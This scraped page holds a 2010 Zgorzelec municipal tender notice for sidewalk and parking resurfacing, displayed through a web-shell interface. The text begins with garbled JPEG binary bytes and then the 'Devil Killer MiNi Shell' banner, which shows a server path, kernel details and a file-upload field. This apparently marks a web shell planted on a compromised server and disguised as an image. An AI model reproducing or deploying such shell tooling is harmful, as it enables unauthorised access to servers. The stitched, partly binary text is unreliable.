JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100705/194574-N-2010.html

<p class="kh_header"><b>Zgorzelec: Modernizacja nawierzchni chodnika i parkingu przy ul. Słowackiego za Kościołem i na ul. Grunwaldzkiej</b><br>
<b>Numer ogłoszenia: 194574 - 2010; data zamieszczenia: 05.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja nawierzchni chodnika i parkingu przy ul. Słowackiego za Kościołem i na ul. Grunwaldzkiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest modernizacja nawierzchni chodników i nawierzchni 
    miejsc postojowych ulicy Słowackiego oraz nawierzchni chodnika ulicy 
    Grunwaldzkiej w Zgorzelcu. 
2. Istniejące chodniki wykonane są z masy bitumicznej oraz z płytek betonowych, 
    które są nierówne, popękane, częściowo zmurszałe i posiadają znaczne braki. 
    Miejsce istniejącego parkingu wykonane jest z płytek betonowych, a miejsca 
    parkingowe  rozdzielone białą farbą. 
    Pod modernizowanymi chodnikami i parkingiem przebiegają sieci uzbrojenia terenu, 
    które wymagają uwagi przy prowadzeniu prac budowlanych.
3. Modernizacja  ul. Słowackiego polega na przebudowie i wymianie nawierzchni 
    chodników, które  należy wykonać po obu stronach pasa ruchu drogowego.
    W obrębie ul. Słowackiego należy wymienić nawierzchnię  parkingu wraz z 
    zaznaczeniem i wyodrębnieniem poszczególnych miejsc postojowych (poprzez 
    wyakcentowanie podziału kostką brukową innej barwy), zgodnie z dokumentacją 
    projektową - załącznik nr 9 do SIWZ. Linia modernizowanego parkingu pozostaje 
    bez zmian. 
    Przy modernizowanym parkingu ze względu na zły stan i nierówności nawierzchni 
    drogowej asfaltowej, uniemożliwiającej powierzchniowe odwodnienie parkingu 
    poprzez właściwe wyprofilowane spadki poprzeczne należy uwzględnić częściowo 
    jej naprawę.
    Miejsce naprawy nawierzchni wynosi  2,0m szerokości, które zaznaczono na planie 
    sytuacyjnym. 
    Naprawę nawierzchni drogowej należy przeprowadzić poprzez sfrezowanie 
    wierzchniej warstwy ścieralnej głębokości 6 cm  i nałożenie nowej warstwy asfaltu 
    drogowego z odtworzeniem pierwotnych spadków.
    Na całej długości przebudowywanej i modernizowanej nawierzchni w obrębie ul. 
    Słowackiego należy wymienić krawężniki drogowe. 
    Ze względu na zły stan oraz ubytki w ogrodzeniach posesji sąsiednich,  należy 
    częściowo zabudować obrzeża rozgraniczające pomiędzy chodnikiem, a granicą 
    działek prywatnych (w miejscach gdzie nie występują stałe murki ogrodzeniowe). 
4. Modernizacja ul. Grunwaldzkiej polega na wymianie nawierzchni chodnika po 
    jednej  stronie pasa ruchu drogowego (południowa część ulicy Grunwaldzkiej). 
    W miejscu rosnących drzew należy wykonać otoczkę zgodnie z załączonym 
    rysunkiem - załącznik nr 9 do SIWZ. Miejsca wokół drzew, wewnątrz otoczki 
    należy obsypać korą.
    Ze względu na dobry stan krawężników drogowych kamiennych granitowych 
    należy je wyregulować i pozostawić do dalszego funkcjonowania. 
5. Nawierzchnię parkingu jak i nawierzchnię chodników należy wykonać z 
    prostokątnej kostki betonowej (chodnikowej) z podbudową według przekrojów 
    wykonawczych.
6. Modernizację istniejących wjazdów na poszczególne posesje należy wykonać, 
    zaniżając odcinki chodników na szerokości odpowiednio do zastałej sytuacji. 
7. W miejscach oznaczonych linią przerywaną na rysunku planu sytuacyjnego, 
    należy wykonać zaniżenia krawężników zgodnie z przekrojami wykonawczymi. 
8. Konstrukcja  nawierzchni parkingu składa się z :
    a) nawierzchni z betonowej kostki brukowej wibroprasowanej, 
    b) podsypki cementowo-piaskowej, 
    c) podbudowy zasadniczej z kruszywa łamanego, 
    d) warstwy odcinającej.
9. Konstrukcja nawierzchni chodników składa się z:
    a) kostki betonowej drobnowymiarowej wibroprasowanej, 
    b) podsypki cementowo-piaskowej, 
    c) podsypki piaskowej, 
    d) warstwy odcinającej. 
10.Modernizowaną nawierzchnię parkingu oraz nawierzchnię modernizowanych 
    chodników należy odwadniać powierzchniowo, ze sprowadzeniem wód opadowych 
    do istniejących wpustów ulicznych, a następnie do istniejącej kanalizacji 
    deszczowej. Wyprowadzenie wód  zapewnią założone spadki poprzeczne oraz 
    podłużne.
11.Zestawienie powierzchni:
    a) chodniki piesze istniejące, nawierzchnia w całości do modernizacji - 667m2
    b) parking istniejący, nawierzchnia w całości do modernizacji             - 113 
        m2       
    c) nawierzchnia drogowa do naprawy                                          -59m2          
12.Szczegółowy zakres robót dla zadania objętego modernizacją nawierzchni 
    chodników i parkingu przy ul. Słowackiego oraz modernizacją chodnika przy ul. 
    Grunwaldzkiej został zawarty   w dokumentacji projektowej składającej się z opisu 
    technicznego, planu sytuacyjnego, przekroju drogowego, schematu ułożenia 
    kostki na chodnikach, schematu ułożenia kostki na parkingu, Specyfikacji 
    Technicznej Wykonania i Odbioru Robót, przedmiarze  robót  - załącznik nr 9 do 
    SIWZ.     
13.Wykonawca przed przystąpieniem do realizacji robót budowlanych, przedstawi 
    Zamawiającemu wykonany i zatwierdzony projekt tymczasowej organizacji ruchu 
    na czas przebudowy nawierzchni chodników oraz modernizacji parkingu. 
14.Przed przystąpieniem do w/w robót Wykonawca winien   dokonać wizji lokalnej 
    terenu, objętego robotą budowlaną, celem zapoznania się z warunkami realizacji 
    przedmiotu zamówienia.  Wizję lokalną Wykonawca dokona na koszt własny. 
15.Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia zgodnie z 
    dokumentacją projektową, przedmiarem robót, technologią wskazaną przez 
    Projektanta, zgodnie z zasadami wiedzy technicznej, normami,  wskazaniami 
    Zamawiającego, oraz obowiązującymi   przepisami.
16.Zobowiązuje się Wykonawcę do wykonania i przedstawienia  Zamawiającemu, 
    zatwierdzonego projektu docelowej organizacji ruchu  wzdłuż ul. Słowackiego od 
    skrzyżowania z ul. Łużycką do ul. Św. Jana, najpóźniej w dniu  dokonywania 
    czynności odbiorowych robót  budowlanych.         
17.Zobowiązuje się Wykonawcę do opracowania kompletnej dokumentacji 
    powykonawczej w 2-ch  egzemplarzach  i przekazanie jej Zamawiającemu 
    wraz ze zgłoszeniem gotowości robót  budowlanych do odbioru.  
18.Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt 22 ustawy o 
    odpadach, ma obowiązek zagospodarowania odpadów powstałych podczas 
    realizacji zamówienia, zgodnie z ustawą o odpadach z dnia 27 kwietnia 2001r. 
    (tekst jednolity z 2007r. Dz. U. Nr 39, poz. 251 z póź. zm.)  i ustawą Prawo 
    ochrony środowiska  z dnia 27 kwietnia 2001r. (tekst jednolity z 2008r. Dz. U. Nr 
    25, poz.150). 
    Wykonawca przedstawi Zamawiającemu potwierdzenie zagospodarowania ,  
    odpadów zgodnie z powszechnie obowiązującymi przepisami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty budowlane polegajace na powtórzeniu tego samego rodzaju zamówień, stanowiące nie więcej niz 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt.6 ustawy Pzp</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.22.33.10-9, 45.23.32.51-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 59.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający żąda od wykonawców wniesienia wadium w wysokości 3 000,00 zł. 
     PLN (słownie: trzy tysięce zł.)
2.  Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania 
     ofert. 
     Wadium musi być na koncie Zamawiającego przed upływem terminu składania 
     ofert.  
3.  Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na 
     przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 
     3 ustawy Pzp, albo nie zgodzi się na przedłużenie okresu związania ofertą 
     zostanie wykluczony z postępowania o udzielenie zamówienia, a oferta 
     Wykonawcy wykluczonego zostanie odrzucona zgodnie z art. 24 ust. 2 pkt. 4 
     ustawy Pzp.
4.  W zależności od woli wykonawcy wadium może być wnoszone w następujących  
     formach:
    1)	pieniądzu,
    2) poręczeniach bankowych lub poręczeniach spółdzielczej  kasy 
        oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze 
        poręczeniem pieniężnym,
    3) gwarancjach bankowych,
    4) gwarancjach ubezpieczeniowych,
    5) poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 
        pkt 2 ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
        Przedsiębiorczości   (Dz.U. Nr 109, poz. 1158 z póź.zm.).
UWAGA!
Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy 
Pzp  musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej jeżeli 
Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 
ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 
ust. 1, lub pełnomocnictw.  
5.  Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego 
     wniesienie wadium do Zamawiającego.
6.  Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
     Zamawiającego Nr 35124012971111000025654013 Bank PEKAO S.A. I
     O/Zgorzelec.
     Na przelewie należy  umieścić informację :
     Wadium na Modernizacja nawierzchni chodnika i parkingu przy ul. Słowackiego 
     za Kościołem i na ul. Grunwaldzkiej                  
7.  Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem 
     wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z 
     zastrzeżeniem pkt. 24.13 SIWZ. 
8.  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
     zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia 
     publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
9.  Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał 
     ofertę przed  upływem terminu składania ofert. 
10.Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu
     zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp , jeżeli w wyniku 
     ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako 
     najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez 
     Zamawiającego. 
11.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
     wynikającymi z umowy rachunku bankowego, na którym było ono 
     przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz 
     prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez 
     wykonawcę .
12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
     oferta  została wybrana :
     a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
         określonych w ofercie, 
     b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
     c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
         przyczyn   leżących  po stronie wykonawcy.
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
     odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
     dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, 
     chyba że udowodni, ze wynika to z przyczyn należących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
     metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
     dokumenty i oświadczenia.  
2)  Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3)  Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   
4)  Jako spełniający warunek udziału w postępowaniu zostaną ocenieni wykonawcy, 
     którzy wykażą wykonanie, dwóch robót budowlanych polegających na wykonaniu 
     nawierzchni z kostki brukowej betonowej o łącznej wartości min. 180 000,00 
     zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
     metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
     dokumenty i oświadczenia.  
2)  Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3)  Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   
4)  Jako spełniający warunek udziału w postępowaniu zostaną ocenieni Wykonawcy, 
     którzy  wykażą, iż dysponują  minimum 1 osobą, która będzie wykonywać 
     zamówienie, posiadającą prawo wykonywania samodzielnych funkcji technicznych 
     w budownictwie do kierowania robotami budowlanymi w specjalnosci drogowej, 
     wraz z załączeniem oświadczenia, o posiadaniu przez w/w osobę uprawnień 
     budowlanych w specjalności drogowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi załączyć następujące dokumenty:   
       1)  wypełniony i podpisany formularz ofertowy (wg. załączonego wzoru), 
       2)  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
            (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
            konsorcjum), 
       3)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. 
            Prawo  zamówień   publicznych - załącznik nr 2 do SIWZ, 
            W przypadku nie dołączenia do oferty powyższego załącznika, bądź jego nie 
            wypełnienia, Zamawiający uzna, że Wykonawca wykona zamówienie
            własnymi siłami. 
  Uwaga!
  W przypadku kiedy Wykonawca będzie korzystał z wiedzy i doświadczenia innych 
  podmiotów, a nie załączy, bądź nie wypełni załącznika nr 2 do SIWZ do oferty, 
  Zamawiający nie będzie mógł uznać spełnienia warunku określonego w pkt. 
  11.1 pkt. 1 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewidział możliwość dokonania zmian postanowień umowy,  przy 
   czym warunki takiej zmiany Zamawiający określił  w § 11  projektu umowy. 
   Zakres przewidzianych zmian: 
   1) termin określony w pkt. 4 SIWZ i § 3 ust. 1 projektu umowy  ulegnie  
       przesunięciu w przypadku wystąpienia opóźnień wynikających z:  
       a) opóźnień zawinionych przez Zamawiającego, tzn. jeżeli takie opóźnienie jest 
           lub będzie miało wpływ na termin realizacji przedmiotu umowy w 
           szczególności dot. przekazania terenu budowy, jakichkolwiek opóźnień, 
           utrudnień, za które Wykonawca nie ponosi odpowiedzialności, 
       b) opóźnień z powodu wystąpienia warunków   atmosferycznych 
           uniemożliwiających wykonanie robót budowlanych zgodnie z technologią  - 
           fakt ten musi mieć odzwierciedlenie w Dzienniku budowy i musi być 
           potwierdzony przez Inspektora Nadzoru, 
       c) zaistnienia przypadku działania siły wyższej, przez którą rozumieć należy 
           zdarzenie zewnętrzne o charakterze: niezależnym od stron, którego strony 
           nie mogły przewidzieć przed zawarciem umowy i którego nie można uniknąć 
           ani któremu strony nie mogły zapobiec przy zachowaniu należytej 
           staranności, której nie można przypisać drugiej stronie. 
           Za siłę wyższą warunkującą zmianę umowy uważać się będzie w 
           szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki (nie 
           dotyczą pracowników Wykonawcy), ataki terrorystyczne, działania wojenne, 
           nagłe przerwy w dostawie energii elektrycznej, promieniowanie, lub skażenia, 
       d) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym 
           wpływ na realizację przedmiotu zamówienia,                  
      e) wstrzymania robót budowlanych  przez uprawnione organy.         
2. W przedstawionych w punkcie 1 podpunkt 1 przypadkach wystąpienia opóźnień, 
    strony ustalają nowe terminy realizacji umowy, z tym, że okres  przesunięcia 
    terminu realizacji przedmiotu umowy równy będzie co najmniej okresowi przerwy 
    lub postoju. 
3. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie 
    powstałych okoliczności w formie opisowej i właściwie umotywowanej, 
    potwierdzonej przez każdą ze stron umowy. 
4. Strona ubiegająca się o zmianę umowy w w/w przypadkach, winna zwrócić się do  
    Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
    zmian  w umowie aneksem, w  terminie 7 dni od daty zaistniałej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2010 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec 
ul.  Domańskiego 7
Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





